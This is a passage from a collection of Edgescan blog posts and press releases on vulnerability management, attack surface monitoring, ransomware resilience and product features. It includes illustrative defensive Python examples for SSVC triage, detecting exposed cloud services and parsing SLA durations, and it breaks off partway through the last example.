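    points["technical_impact"] = (None if r.total_control is None
                                  else "total" if r.total_control else "partial")

    # Automatable: a compensating control such as MFA blocks end-to-end automation
    # even when the exploit itself could be scripted (assumption for this example).
    if r.exploit_automatable is None:
        points["automatable"] = None
    else:
        scriptable = r.exploit_automatable and not r.compensating_controls
        points["automatable"] = "yes" if scriptable else "no"

    points["mission_prevalence"] = (None if r.mission_essential is None
                                    else "essential" if r.mission_essential else "support")
    points["public_well_being"] = r.well_being_impact
    points["mitigation_status"] = (None if r.mitigation_available is None
                                   else "available" if r.mitigation_available else "none")

    missing = [name for name, value in points.items() if value is None]
    return points, missing


def decide(r: VulnRecord) -> Tuple[str, List[str]]:
    """Return (outcome, missing): track / track* / attend / act, or 'undecidable'
    together with the decision points that could not be derived."""
    p, missing = decision_points(r)
    if missing:
        return "undecidable", missing
    # Illustrative policy: exploitation evidence and organisational context escalate.
    if p["exploitation"] == "active" and (p["mission_prevalence"] == "essential"
                                         or p["public_well_being"] == "irreversible"):
        return "act", []
    if p["exploitation"] == "active" or (p["automatable"] == "yes"
                                         and p["technical_impact"] == "total"):
        return "attend", []
    if p["exploitation"] == "poc" or p["technical_impact"] == "total":
        # A known weakness with no workable mitigation is not left at track*.
        return ("attend" if p["mitigation_status"] == "none" else "track*"), []
    return "track", []


def triage(records: List[VulnRecord]) -> Dict[str, int]:
    """Count outcomes; the 'undecidable' bucket is the backlog that lacks context."""
    counts: Dict[str, int] = {}
    for r in records:
        outcome, _ = decide(r)
        counts[outcome] = counts.get(outcome, 0) + 1
    return counts


# Constructed sample backlog; CVE ids and asset names are placeholders.
SAMPLE_BACKLOG = [
    VulnRecord("CVE-0000-0001", "vpn-gw-01", public_poc=True, in_cisa_kev=True,
               total_control=True, exploit_automatable=True,
               mission_essential=True, well_being_impact="material",
               mitigation_available=True),
    VulnRecord("CVE-0000-0002", "intranet-wiki", public_poc=True, total_control=False,
               exploit_automatable=True, compensating_controls=("mfa",),
               mission_essential=False, well_being_impact="minimal",
               mitigation_available=True),
    # Technical facts known, but no BCP tiering or well-being assessment on file.
    VulnRecord("CVE-0000-0003", "legacy-erp", total_control=True,
               exploit_automatable=False),
]
```

Running triage(SAMPLE_BACKLOG) buckets the third record as undecidable, which is the practical shape of the problem: the technical facts are there, the business context is not.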
But we don’t always value, store and leverage contextual data enough to become effective:

- Lots of metadata is required to formulate a decision, which is possible but difficult to catalogue.
- Lots of this metadata is contextual, based on where a vulnerability is discovered: items such as a system’s mission prevalence, public well-being impact and even whether the exploit is automatable once kill chains are considered.

This model is super effective for a company which has the required contextual information at hand, and at scale in terms of enterprises. From experience this is more often not the case.

Effective widescale use of this model would require both DR (Disaster Recovery) metrics and identification of AAA systems/components across the enterprise. Simple items such as an SBOM (Software Bill of Materials), threat modelling (to discuss mitigations) and a mission-critical asset inventory would be required for this to be effective across the enterprise. Storing and utilising machine-readable metadata containing both business and technical attributes of end-to-end systems across the organization would be required to make this effective.

Overall, my conclusion circles around the fact that risk is contextual, and it would be rare to store and provide adequate meta/attribute data to automate SSVC. Automation of frameworks such as SSVC is how we all can win, but it is an uphill battle…

### Press Release: Edgescan Illuminates and Eliminates Public Cloud Risk with the Release of Cloudhook

New cloud native integration provides unprecedented risk visibility with the ability to monitor cloud assets and their security posture in one unified platform.

DUBLIN – MARCH 1, 2023 – Edgescan, the first fully integrated cybersecurity platform, announced today the release of Cloudhook for cloud native environments.
The Cloudhook integration feeds location data (IPs and hostnames) into the Edgescan platform and leverages both the external attack surface management (EASM) and vulnerability management components to illuminate and eliminate risk. As a cloud endpoint changes, Edgescan keeps pace with the evolving environment.

The modern cloud attack surface is ephemeral and in constant flux in order to support business critical infrastructure. The Edgescan platform keeps pace with these changes by ensuring complete visibility across an organization’s global attack surface to eliminate security blind spots. This ensures all IT assets are inventoried and included in security monitoring and testing to build a resilient business posture.

“Security tools that dynamically inventory and monitor your assets as your global attack surface expands into the cloud are no longer a nice to have, they are a requirement for robust security programs,” said Eoin Keary, Founder and CEO of Edgescan.

Media Contact:
Christine Carrig
SVP Global Marketing
Edgescan
pr@edgescan.com

### Buyer Beware: During a Merger or Acquisition Their Digital Footprint Becomes YOUR Attack Surface

When it comes to mergers and acquisitions, it is time to turn on the heat and scrutinize corporate security practices.

I came across an interesting article published by the Wall Street Journal. It discusses how private equity firms have been turning up the heat on cyber security requirements when evaluating mergers and acquisitions (M&A), because the ramifications of security issues from an M&A target or one of their portfolio companies cause a domino effect in the security posture of all their corporate assets. This may not feel like breaking news to those of us in the field, but it does bring attention to the due diligence and tougher requirements that are being set by private equity firms prior to an acquisition, to ensure that their portfolio companies are effectively monitoring their security posture. Simply put, with any acquisition or merger, their security exposures become the acquiring company’s as well.

“Many private-equity firms are taking a similarly serious approach to cyber,” said Chris Stafford, a partner in the mergers and acquisitions group at advisory firm West Monroe Partners LLC, “in part due to the increased visibility of—and responsibility for—cyber risk management at senior executive levels.”

Source: https://www.wsj.com/articles/private-equity-firms-tighten-focus-on-cyber-defenses-at-portfolio-companies-11673643373?reflink=desktopwebshare_linkedin

Their digital footprint is your attack surface

Today, a company’s digital footprint is universally regarded as a business risk, operationally and financially, by the organization itself and by potential investment firms. Not convinced? Look at the evolution of cyber insurance requirements over the past ten years or so. So, where do you start?
You need to see and map your attack surface

The first step in evaluating your security posture is understanding your attack surface and knowing exactly where you are publicly exposed. From there, you must determine the risk of each exposure. What would the cost to the business be if a bad actor were to get in through any of those public-facing vectors?

The Edgescan platform maps and continuously monitors your attack surface

The first step during a merger or acquisition is to inventory all IT assets and get complete visibility over the organization’s attack surface. The external attack surface management (EASM) component of the Edgescan Platform will provide the security posture of an organization. The platform continuously scans and intelligently maps a company's entire attack surface, identifying exposed services, shadow/lost/forgotten deployments, and rogue/unknown APIs, all without requiring any deployment or configuration. Events can be custom configured to alert on deltas found with ASM, and the identified external estate can then be put into a vulnerability scanning cadence.

“Due diligence processes today are not just focused on whether a company has the right policies or governance in place. They can now include network scanning and penetration testing, where security specialists attempt to break into systems…”

Source: https://www.wsj.com/articles/private-equity-firms-tighten-focus-on-cyber-defenses-at-portfolio-companies-11673643373?reflink=desktopwebshare_linkedin

Pen testing should go beyond an automated scan

The next logical step in an in-depth evaluation of a company’s security posture is pen testing. Most solutions provide automated penetration testing, which is simply a fancy way to say scanning. An effective penetration test should always be a combination of automated scanning and human curiosity to probe the business logic; humans are capable of thinking and executing in ways that cannot yet be completely automated.
If you do not have the human eyes and intelligence to evaluate the output, you are simply getting an automated scan.

The Edgescan platform offers a truly differentiated element to pen testing – human expertise

Edgescan offers Penetration Testing as a Service (PTaaS), which is a hybrid solution that combines the breadth of automation with the depth of human assessment. Our hybrid model not only leverages the deep security expertise of our technical team, but also the full stack of solutions that are part of the Edgescan platform. Our Smart Vulnerability Management Platform offers continuous vulnerability assessment, manual business logic assessment, vulnerability validation, risk rating and prioritization, remediation guidance, unlimited re-testing, and expert support. Where traditional penetration testing engagements only capture a snapshot in time, Edgescan’s PTaaS provides you with a continuous view of your risk, with the ability to demonstrate you are eliminating that risk.

Work smarter, not harder. We have all heard this saying. With the Edgescan platform, you can know the risk associated with any company asset, at any time.

See how we do it. Sign up for a demo today!

### Shift Left is not working…..

Over the past decade the “shift left” movement has been gaining traction. The premise is that if we tool-up with cyber security earlier in the development lifecycle, we should get better and more secure product/code. At first glance, this appears logical and totally makes sense: let us prevent things from happening instead of fixing things that have already happened.

Shift left testing and validation is designed to prevent the following:

- Insufficient resources allocated to testing – insufficient testing. Test earlier and often.
- Undiscovered defects/errors and design flaws in requirements, architecture, and design, along with significant effort wasted while implementing them. We’ve always done this to some extent in “waterfall software development” – I’d suggest this is nothing new.
- Difficult and complex testing which results in reduced code coverage during testing.
- And so on …

Has It Worked?

I am sure that metrics are available citing the savings, efficiency, training, and awareness of development relating to security vulnerabilities, etc., which all point to the positive. But “the problem,” “the elephant in the room,” “the mini donkey in the cottage,” “place your favorite metaphor here,” is that global metrics point to the fact that things are worse than ever…

“It’s the Software, Stupid…”

(Software is defined as the following: applications, API, OS, firewall, cloud, load balancers, browsers, web servers, toasters, etc. …)

“Secure software only does what it was designed to do. Anything else is weakness.”

We can argue about network vs. web application vs. mobile vs. API vs. ransomware vs. bots vs. quantum AI, but the fact remains that threat actors present different problems; breaches are based on different scenarios, and each attack requires a different solution. This is an arguable but fair statement.

The method of breach, pivot and exploit is all based on a couple of weaknesses:

- Point 1: Logical weaknesses, which include poor authentication, poor authorization and poor business logic design.
- Point 2: Technical weaknesses, which are vulnerabilities in software: those weaknesses which can be exploited via tools, manual know-how or “commercial grade” exploitation toolkits.

Point 1 above is due to poor design, peer review, understanding of use cases and environment, and lack of awareness of potential threats/risks to the system. We have always had to contend with this. Point 2 is all about the software, stupid.
Even though we have “shift left” coursing through our veins, even the biggest and most profitable/experienced enterprises are still producing critically weak systems which are widespread, amplifying the problem. Most of the companies in the enterprise space have adopted a shift left approach, which is great, but it certainly cannot be the sole solution to addressing the problem of software insecurity.

Shift left is static: the full stack system is being tested in an environment which does not change around it.

Change gives rise to risk: our environment is always changing. Even in the systems where the developer code is not subject to too much change, the landscapes in which they live are. Vulnerabilities in the browser, the web server, the cryptography, and the firewall all rely on each other and, combined, deliver the system solution.

Change occurs when:

- A system does not change: over time critical vulnerabilities are discovered. Patches are released. Yesterday I was secure, today I’ve a Critical Risk. Need to patch/redeploy.
- A system changes: new features deployed, new services exposed, larger attack surface, more exposed, more to attack, more headaches...

For example, an enterprise system is defined by numerous components:

- Many of them open-source, third party, with various degrees of secure design and development.
- A deployment environment developed by a third party, subject to vulnerabilities and human error.
- A custom web application developed by the enterprise.
- A firewall, WAF etc., also prone to vulnerabilities and coding errors.
- A third-party client-side component.
- A B2B service to deliver a function we purchased and built.

In 90% of cases, Shift-Left Security would only help assure point 2 above – the developed code. We hope this highlights our main point and has painted a landscape of castles made of sand....
We Need to Shift Left, Right, and Across the Full Stack…

Shift Left makes sense when approaching system resilience and developing secure code, but NOT when it comes to effectively measuring a system’s security posture in the wild, where all the components are working in tandem. We need to focus on run-time assessment, using automation for scale and efficiency, but we need accuracy and depth also. Shifting right addresses some of this by virtue of production-safe testing of an application in its living environment. We need continuous assessment and attack surface management to continuously monitor the asset, and the environment in which it is deployed….

“Let’s get Shifty…”

Let’s discuss how the Edgescan platform can help you!

### Native Cloud Integration For EASM And Vulnerability Management

Keeping pace with the continuous flux of cloud deployments – “Edgescan Cloudhook”

IT environments are ever-changing and dynamic. New applications, infrastructure and data are often added without the security team’s knowledge, which in turn expands the attack surface. Security policies are typically ignored at scale, which makes understanding your digital footprint a near-impossible endeavour. Massive multi-tenant and multi-user environments, dynamically allocated resources or simply the sheer number of services to secure will ultimately lead to one or more of the following:

- Theft of data from a cloud service by threat actors.
- Incomplete control over user access.
Cloud applications being provisioned outside of IT visibility (e.g., shadow IT) Inability to monitor data in transit to and from cloud services, applications and API’s. Inability to prevent the misuse of data or attacks from the “inside”. Lack of team members with the skills to manage cloud security. An overall lack of visibility into the type of data in cloud application storage. Threats and attacks against the cloud application provider. Inability to assess the security of the cloud application provider’s operations. (Don’t presume security isn’t your concern because you are using a 3rd party hosting somewhere else) An Inability to maintain regulatory compliance.   If Your organization is using cloud services, particularly from one of the “big 3”, namely, AWS, AZURE and GCP you first need to identify if they form part of your main security strategy and if not, they should be front and centre. To mitigate cloud computing security risks, there are several best practices that all organizations should work towards, but it all starts with one word “Visibility”. The first step should always be to understand what’s deployed on the public Internet with an External Attack Surface Management (EASM) solution. The Second step is to take that inventory and ensure it is secure and free of vulnerabilities with an full-stack vulnerability management (VM) solution. This is where technology is required particularly for cloud integrations which are vital in plugging the gaps that traditional inventory management tools can miss. Most modern cloud consoles will feature some sort of asset management tool but typically what’s on offer is a basic visibility component. And yes, this is the first step but why not solve multiple problems with one solution? An organization needs to ask itself how its cloud inventory is being monitored by its security tools as it evolves. 
Can you trust that once a new service is spun up or changes over time, it is automatically scanned for vulnerabilities or exposures? You will find the visibility components of modern cloud providers can be limited with regard to exposure. Having visibility that a cloud endpoint exists is clearly not enough. An organization needs to understand what’s running on that device, whether its services are in date and, most importantly, what services are exposed to the wild.

Let’s take phishing for example. In 2020 and 2022 it remains the most common security incident to affect cloud environments. According to statista.com it accounts for 73% of overall attacks. The traditional approach to remediation is to invest heavily in email security and employee security awareness training. While this is important, it’s clear that it is a mitigation as opposed to a comprehensive fix. The recommended approach should be to focus on closing the door as opposed to simply employing a doorman. Most ransomware variants rely on a technical aspect and human error. The technical aspect typically targets exposed services such as RDP, SSH, SMB, FTP, misconfigured firewalls etc. If an organization can understand where they have these types of dangerous services exposed, they can plug the leak “before the pipe bursts”.

Cloud integrations, or as we like to refer to them, “Cloudhook”, are connectors designed to accomplish this task. They provide an effective way to automate your cloud security program, particularly as it relates to External Attack Surface Management (EASM) and Vulnerability Management (VM). Edgescan Cloudhook is designed to consolidate both EASM and VM into a unified solution: visibility and vulnerability detection, in real time as the cloud deployment evolves. As services are spun up and down, Cloudhook automatically enumerates and inventories an organization’s environment into its ASM and Vulnerability Management modules.
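The core of what an inventory connector has to do for the exposed-service problem above is compare successive snapshots of what is deployed and flag anything newly reachable from the whole internet on a high-risk port. The following is an added example (not Edgescan or Cloudhook code); the snapshot format, the asset names and the IP ranges are constructed for illustration, and a real connector would build the same structure from the cloud provider's security-group or firewall API.

```python
"""Diff two cloud inventory snapshots and flag internet-exposed high-risk services.

Added example, not Edgescan code. The inventory format is an assumption made
for this example: each asset carries the (port, source CIDR) pairs its
firewall / security group allows inbound."""
from dataclasses import dataclass, field
import ipaddress

# Services the article calls out as the usual technical entry points for ransomware.
HIGH_RISK_PORTS = {
    21: "FTP",
    22: "SSH",
    445: "SMB",
    3389: "RDP",
}


@dataclass(frozen=True)
class Asset:
    asset_id: str
    public_ip: str
    # (port, source_cidr) pairs allowed inbound by the firewall / security group
    ingress: frozenset = field(default_factory=frozenset)


def is_world_reachable(cidr: str) -> bool:
    """True if the allowed source range is effectively the whole internet (v4 or v6)."""
    return ipaddress.ip_network(cidr, strict=False).prefixlen == 0


def exposed_high_risk(asset: Asset) -> list:
    """Return [(port, service_name)] for high-risk services reachable from anywhere."""
    findings = []
    for port, cidr in sorted(asset.ingress):
        if port in HIGH_RISK_PORTS and is_world_reachable(cidr):
            findings.append((port, HIGH_RISK_PORTS[port]))
    return findings


def diff_inventory(previous: dict, current: dict) -> dict:
    """Compare two {asset_id: Asset} snapshots taken at different times.

    Reports assets that appeared, disappeared or changed their ingress rules,
    plus any high-risk service that became world-reachable on a new or changed
    asset (the "door left open" the text describes)."""
    added = sorted(set(current) - set(previous))
    removed = sorted(set(previous) - set(current))
    changed = sorted(a for a in set(current) & set(previous)
                     if current[a].ingress != previous[a].ingress)
    new_exposures = {}
    for asset_id in added + changed:
        before = exposed_high_risk(previous[asset_id]) if asset_id in previous else []
        after = exposed_high_risk(current[asset_id])
        gained = [f for f in after if f not in before]
        if gained:
            new_exposures[asset_id] = gained
    return {"added": added, "removed": removed, "changed": changed,
            "new_exposures": new_exposures}


# Constructed sample snapshots (documentation address ranges, not real infrastructure).
SNAPSHOT_T0 = {
    "web-01": Asset("web-01", "203.0.113.10",
                    frozenset({(443, "0.0.0.0/0"), (22, "198.51.100.0/24")})),
    "db-01": Asset("db-01", "203.0.113.20", frozenset({(5432, "10.0.0.0/8")})),
}
SNAPSHOT_T1 = {
    # SSH on web-01 was widened from an office range to the whole internet
    "web-01": Asset("web-01", "203.0.113.10",
                    frozenset({(443, "0.0.0.0/0"), (22, "0.0.0.0/0")})),
    # a new host appeared with RDP open to the world; db-01 was decommissioned
    "jump-01": Asset("jump-01", "203.0.113.30", frozenset({(3389, "0.0.0.0/0")})),
}

if __name__ == "__main__":
    for key, value in diff_inventory(SNAPSHOT_T0, SNAPSHOT_T1).items():
        print(f"{key}: {value}")
```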
Automatic security assessment, visibility and exposure detection.

Firstly, let’s look at the unique benefits that a feature-rich EASM solution can offer:

- Enumerate unknown assets, uniquely identify them, track change and deployment, and automate the analysis of changes in the enterprise’s IT landscape.
- Keep pace in real time with changes to the cyber landscape. As the cloud changes, it is reflected in both ASM and Vulnerability Management automatically.
- Enterprises need continuous enumeration of cloud/IT weaknesses, exposures and misconfigurations to reduce the risk of data breaches, exposures and privacy non-compliance.
- Track and control cloud spending by identifying shadow cloud/IT deployments.
- For users in GRC/Risk Management and privacy functions, ASM helps ensure compliance with security and privacy regulations and frameworks by detecting potential exposures.

Again, to hammer it home: complete visibility is the cornerstone of a robust security posture. You can’t secure what you don’t know about. With today’s cloud-enabled and rapid development environment, technologies such as Cloudhook must be considered as vital in your security program as running vulnerability scans or penetration tests.

However, as an interesting side-step, one of the scenarios I’ve recently witnessed is clients using EASM and visibility as tools to focus on cost-saving or reaching carbon goals. The premise is quite similar: if a service should not be deployed, then take it down.

After exposure has been reviewed and mitigated, the next step is to ensure vulnerability scanning and security testing are taking place. With the Edgescan Cloudhook this happens seamlessly in conjunction with EASM.

In conclusion, the takeaway here is that native cloud integrations (Cloudhook) are a vital component for any client that is mature in their cyber security posture, or for any client that is undergoing digital transformation to the cloud. Don’t be fooled by the suite of tools offered by your hosting provider. Yes, they provide ways to do basic inventory, but the bigger picture of the overall cloud environment security needs to be considered. A modern, competent security vendor will have the ability to fully automate the various aspects of your cloud security and take away the pain.

### CISA Releases Directives On Asset Discovery And Vulnerability Enumeration

On the 4th of October 2022 CISA released Binding Operational Directive 23-01 for improving asset visibility and vulnerability detection on federal networks. It can be seen here. The guidance is robust and focuses on frequency and coverage. It requires federal organisations to do the following, but the recommendations are applicable to all companies. Implementation guidance is here.

Below is a short mapping of the CISA directive and how Edgescan delivers its features.

Chickens come home to roost. It’s clear that this should be a baseline approach, not just for federal organisations but a minimum requirement for any business. When we review the past few years, most ransomware attacks were the result of a simple breach of systems like remote working services or unpatched firewalls (exposed, unmanaged services). This approach is an attempt to reduce the risk of breach via continuous visibility and vulnerability detection. Something Edgescan has been delivering since 2016!!

If you want to learn more about Edgescan, click the button below:

### Edgescan Integrations Q4 2022

Integrate or die. Following on from some splendid work by the Edgescan teams throughout 2022, we would like to announce some exciting new ecosystem integrations fresh off the press to finish out 2022.

New Ecosystem Integrations

- ServiceNow Security Incidents: Automate the ingestion of Edgescan vulnerability data into ServiceNow Security Incidents by sending webhooks directly from Edgescan as soon as vulnerabilities are discovered.
- AWS (Amazon Web Services): Edgescan can now ingest asset information directly from your AWS instances to automate ASM (Attack Surface Management) and vulnerability scanning of your external-facing services as soon as they become public.
- Microsoft Azure: Edgescan can now ingest asset information directly from your Azure instances to automate ASM and vulnerability scanning of your external-facing services as soon as they become public.
- GCP (Google Cloud Platform): Edgescan can now ingest asset information directly from your GCP instances to automate ASM and vulnerability scanning of your external-facing services as soon as they become public.
- FreshServices: Send vulnerability data directly from Edgescan into FreshServices as a ticket using the native webhooks in Edgescan.
- PlexTrac: Allow users to pull Edgescan data into their customer reporting formats in PlexTrac.

Updated Ecosystem Integrations

- Kenna: Enhanced support.
- Brinqa: Enhanced support via the Brinqa platform. Brinqa customers can add data directly from Edgescan into their Brinqa instance.
- ArmorCode: Enhanced support via the ArmorCode platform. ArmorCode customers can add data directly from Edgescan into their ArmorCode instance.

Learn more about Edgescan Integrations and how they can help your organization.

### Three Ways To Protect Your Enterprise From Ransomware

Ransomware is a real threat to global economies. It is possibly the first case of a cyber issue that has gone mainstream to the point that almost everyone knows what it means and how it can affect people. It causes disruptions to everything from energy to healthcare and civil society, and it shows no signs of stopping. So how did we get here?

Data breaches and hacks have traditionally involved an attacker breaching a system, stealing data and leaving by the back door, only to hopefully be discovered shortly after.
Think of it as harvesting another person’s field and stealing all their crops. Ransomware, on the other hand, has evolved to where an attacker can plant their own malicious crops in your field (weeds), making the field and harvest unusable and possibly also stealing the existing crops. This change in an attacker’s approach results in long-lasting damage: not just theft, but disruption to systems, expanding the duration of damage to the victim.

There are three key ways to be more resilient against ransomware, and although none of them are new, they’re still worth examining: identifying exposed areas of your digital estate, more recently known as external attack surface management (EASM); establishing a regular cadence of vulnerability detection and ensuring accuracy; and making frequent backups of critical data.

1. External Attack Surface Management (EASM)

Think of EASM as a continuous, real-time view of what you own. If you were securing your house, you would make sure every window and door has appropriate locks. Ground-floor security may require additional, stronger locks. EASM operates on the same idea. It provides you visibility of what you own and informs you as things change. It should also alert you when a metaphorical door is left open or a window is left unlocked. The idea behind EASM is not new, but it has recently gained traction in the industry. Many ransomware attacks in 2021 were due to an exposed service that was unknown to the victims. Employing an EASM solution would have informed the business of the exposed service, which, in many cases, would have only required a simple fix to mitigate the risk, possibly saving the ransomware victims millions of dollars.

If your organization isn’t ready to deploy an EASM solution, consider using open-source tools such as Nmap, ZMap or Masscan to scan your external estate and profile your exposed services. Also consider using a network vulnerability scanner such as Greenbone/OpenVAS to detect risks. This would be a good start, but it may be difficult to monitor and filter out what is important on a continuous basis. It is well worth the effort to revisit your attack surface to determine what you currently have exposed and act on any anomalies in due course. A cornerstone of cybersecurity is visibility, because we cannot protect what we can’t see.

2. Regular Cadence And Accuracy Of Vulnerability Detection

The weaknesses being exploited by active ransomware threat actors are often not new or complex. They can be as old as three to five years. Many high-profile ransomware attacks in 2021 leveraged old vulnerabilities that could have been mitigated. A regular cadence of vulnerability management across the full stack (web applications and infrastructure) would have helped detect such weaknesses. Enterprises need to step up their approach and deliver a more frequent and accurate continuous vulnerability detection program in order to identify risks more quickly and mitigate them faster. Accuracy comes into play here and cannot be overstated. Without an accurate solution that only reports validated, real vulnerabilities, IT staff may become overwhelmed with the task of prioritising and validating real risks to the business. This can result in slower response and waste the finite capacity of the IT or cybersecurity team.

3. Backing Up Critical Data

While this is neither a new idea nor a particularly exciting activity, it is a commonly overlooked measure for improving resilience. Ask yourself the question: “If we have a ransomware breach, can we recover?” You need to understand which data is the most critical to the business. This can be a challenge for some businesses, but once done, you can implement a frequent backup cadence. The frequency of backups has a direct relationship with the level of damage a ransomware attack can incur. Higher-frequency backups result in less data lost. Loss of data will stop your business from operating and result in catastrophic damage. I recommend knowing which data is critical to the business and how frequently your backups are occurring. Data should be backed up to a secure off-site location and be easily recoverable.

Conclusion

There are many more aspects to a robust cybersecurity posture, but starting with the above three points will improve resilience dramatically. Knowing what you need to secure and having continuous visibility of your digital assets are paramount. Enterprises are faced with a determined threat that is constantly looking for weaknesses and exposures, so enterprises need to follow suit. The actions listed above are not effortless, but they can be integrated into business-as-usual activities and become standard operating procedures. It’s important to understand that simple mistakes, bugs or unauthorized changes can result in very damaging outcomes, but in many cases such risks can be prevented and detected before the bad guys take advantage. Employing an external attack surface management solution for visibility and service exposure knowledge, establishing a regular cadence of vulnerability management to discover risks and prevent breaches, and frequently making backups for recovery are vital pillars that will help prevent you from becoming a victim of a ransomware attack.

Sign up for a demo to see how Edgescan’s approach to managing an effective cybersecurity program improves your security posture.

### How Cyber Smart Are You? Edgescan’s Cybersecurity Checklist to Help Improve Your Security Posture

With the return of the Pumpkin Spice Latte and the first leaves falling comes also Cybersecurity Month, a time to focus on the fundamentals of IT security and to raise awareness of the best practices that keep us safe from cyberattacks and improve your organization’s security posture. This year has seen attacks targeting large organisations that many would have considered too big to fail.
These security incidents highlighted how, when it comes to security, there might be big and small players, but ultimately all it takes for organisations to have their defences breached is to leave a vulnerability unpatched or for an employee to click on the wrong link. Attacks directed at OT, critical infrastructure, hospitals and government agencies have also highlighted to the public how real the consequences of a cyberattack can be. The attack on Colonial Pipeline created fuel shortages and chaos, while the ransomware that took JBS offline resulted in increased meat prices and panic buying. The physical world is so intertwined with the digital realm that cybersecurity has become everyone’s problem. So, what better time than Cyber Security Month to check that your organisation has all the fundamentals covered and ensure a robust security posture?

1. Do you have an asset inventory?

It sounds obvious, but it’s worth repeating: you can’t protect what you didn’t know was there. Anything on the network – even an internet-connected vending machine – needs to be accounted for. As IT infrastructures become more complicated, scanning all the assets and knowing what’s there is the first step to ensure that there are no visibility gaps. This has become even more relevant in the context of hybrid working models. Continuous asset scanning allows organisations to account for every machine, every server and every IoT device that needs monitoring. An effective external attack surface management tool provides full visibility of all global assets and shadow risk.

2. How often do you scan for vulnerabilities?

There is a right answer to this question, and that’s continuously. New vulnerabilities are discovered on a daily basis, and cybercriminals have become incredibly quick at finding exploits and sharing intelligence on dark web hacking forums. You want to be the first to know if there is a vulnerability in your systems so that it can be patched before it’s exploited.

3. Do you have a patch management policy?

Not all vulnerabilities were created equal, and not all patches can feasibly be installed immediately after they are made available. Sometimes installing a patch requires offline time that might impact operations, or a new software version might interfere with other programs in the environment. Critical and high-risk vulnerabilities should, of course, be patched as soon as possible, but other vulnerabilities might have mitigations that allow an update to be delayed. A patch management policy allows organisations to prioritise which fixes need to be installed immediately.

4. How often do you run security awareness training?

Phishing is still among cybercriminals’ favourite tactics to gain a foothold in an organisation’s network. Educating all employees is essential to avoid someone clicking on a malicious link or downloading an attachment that contains malware. One of the mistakes that many organisations make, however, is to underestimate how common spear phishing and BEC scams have become. Many C-level executives don’t attend security awareness training alongside their employees, and this can result in them falling for a carefully crafted phishing email that will allow an attacker to spoof their identity and commit BEC and CEO fraud. Security awareness training should be run on a regular basis rather than as a one-off, and it might be a good idea to introduce incentives for employees who succeed at a phishing exercise and report the malicious message.

5. What is your company’s security culture like?

Fostering a company culture that encourages employees to come forward when they think they might have clicked on something malicious, or when they think they might have spotted a threat, is also an important component: it serves nobody to create fear; it only delays the discovery of an incident. Encouraging all divisions to take an interest in security and inviting security teams to communicate more with the rest of the functions can go a long way to hardening the frontline of any organisation’s defences.

### Welcome Mark Meyer

Mark Meyer is joining Edgescan as Senior Vice President of World Wide Sales. Mark has held a variety of sales executive roles during his 25 years focused on the cyber security industry, including time at Microsoft, RiskIQ, ThreatModeler, and almost 9 years at WhiteHat Security.

Throughout his career, Mark has been recognized as a genuine, relationship-oriented sales leader, focusing on customer-centric solutions that drive net-new revenue growth and improve overall competitiveness for security startups specializing in Vulnerability Management, SAST, DAST, Threat Intelligence, and External Attack Surface Management.

“I am joining Edgescan at a pivotal time in the cyber security industry and in the growth of our company. What I love about our space is that it will always be in its infancy. Edgescan has an extraordinary reputation, unparalleled customer partnerships, and incomparable employee retention that will help accelerate our growth during this period of vendor consolidation.”

Mark is a graduate of Pace University and lives in New York City.

### New Edgescan Feature: Self-Service

What is Self-Service

Self-Service is a streamlining of the Edgescan onboarding experience. This includes an improved asset creation and asset scanning process capable of supporting the complex configurations associated with both.

Many of these new workflows already existed for the Edgescan penetration testing team. We needed to translate workflows created for seasoned penetration testers into a friendly user experience so that all Edgescan users can benefit from the updates.

We are ready to offer Self-Service as a default to all customers from today.
Key benefits

- Initiate scan – You can now create an asset and initiate scanning in a matter of seconds, ensuring a quicker time to value with Edgescan’s scanning technology.
- Business unit autonomy – You can now grant individual business units the ability to onboard their own assets via the UI, reducing organisation maintenance and administration efforts.
- License management – Less management overhead with the ability to forecast and export more granular breakdowns of license usage in formats understandable by project managers and finance teams.
- Scheduled Exports – Enhanced automation capabilities with set-and-forget exports: you can now schedule configurable exports and reports to be delivered via email at your convenience.

### New Edgescan Feature: SLA

We are excited to announce a brand-new SLA feature that will be added to the Edgescan Platform.

What is an SLA

A service-level agreement (SLA) is an agreement between two or more parties regarding particular aspects of a service. SLAs can either be legally binding contracts or an informal contract between internal departments or teams.

Edgescan’s Approach to SLAs

Edgescan facilitates SLAs governing vulnerability remediation time. A user may set SLAs within the Edgescan application to govern the maximum acceptable remediation time for their vulnerabilities, with a remediation time specified by the user at each level of risk associated with a vulnerability. Vulnerabilities that exceed this remediation time therefore violate their SLA. Vulnerabilities violating SLAs are searchable, and subsequent reports have the option to highlight these vulnerabilities as SLA violations.

How to set up SLAs

SLA settings can be found in the account/settings section by clicking on the highlighted icon on the top right side of the Edgescan webpage. SLA settings are then accessed by clicking on “SLA settings” in the Account/Settings drop-down menu.

The SLA settings allow 5 separate SLAs to be created and modified, governing the time required to close an open vulnerability at a given level of risk. SLAs can be created/modified by selecting the edit icon to the right of the relevant risk level. A form will open that allows users to input the desired remediation time. The time is set by a quantity, immediately followed by the unit it represents: days (d), hours (h) or minutes (m). Multiple units can be provided, separated by spaces. For example, “1d 20h 40m” represents 1 day, 20 hours and 40 minutes that any vulnerability of a given risk can remain open before it is in violation of its SLA.

The SLA value is confirmed by selecting the red tick beside the given SLA. Modification can be cancelled by selecting the “x”, which will revert the SLA to its previous state. An SLA may be removed entirely by clearing the SLA form and confirming the value via the red tick.

Viewing Vulnerabilities with an SLA Violation

After SLAs have been set, violations can be viewed in several ways. Using the “SLA Violated” filter on the vulnerabilities homepage allows users to view all vulnerabilities currently violating their associated SLA.

Vulnerability Page: The page for a given vulnerability displays, on the top left, the date when that vulnerability would violate its SLA.

Reports: Open SLA violations can be viewed in a report in the findings section; they are displayed beside risk and identified with “SLA violation”.

Examples of how it can help your team

SLAs can help improve your team’s vulnerability management. They enable better prioritization of remediation through goal setting.
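To make the mechanics concrete, here is an added example (not Edgescan's code) that parses the “1d 20h 40m” notation described above, derives each vulnerability's violation date from the date it was opened, and lists the open findings that have overrun their SLA, as the “SLA Violated” filter would. It assumes five risk levels simply labelled 1 to 5 (the platform's own labels may differ) and uses constructed vulnerability records.

```python
"""Parse Edgescan-style SLA durations and find SLA violations.

Added example, not Edgescan code. Risk levels 1-5 and the vulnerability
records below are assumptions made for this example."""
import re
from datetime import datetime, timedelta, timezone
from typing import Optional

# One token is a whole number immediately followed by its unit: 1d, 20h, 40m.
_TOKEN = re.compile(r"^(\d+)([dhm])$")
_UNIT_SECONDS = {"d": 86400, "h": 3600, "m": 60}


def parse_sla(text: str) -> Optional[timedelta]:
    """Convert '1d 20h 40m' into a timedelta.

    An empty form means "no SLA" (clearing the form removes the SLA), so
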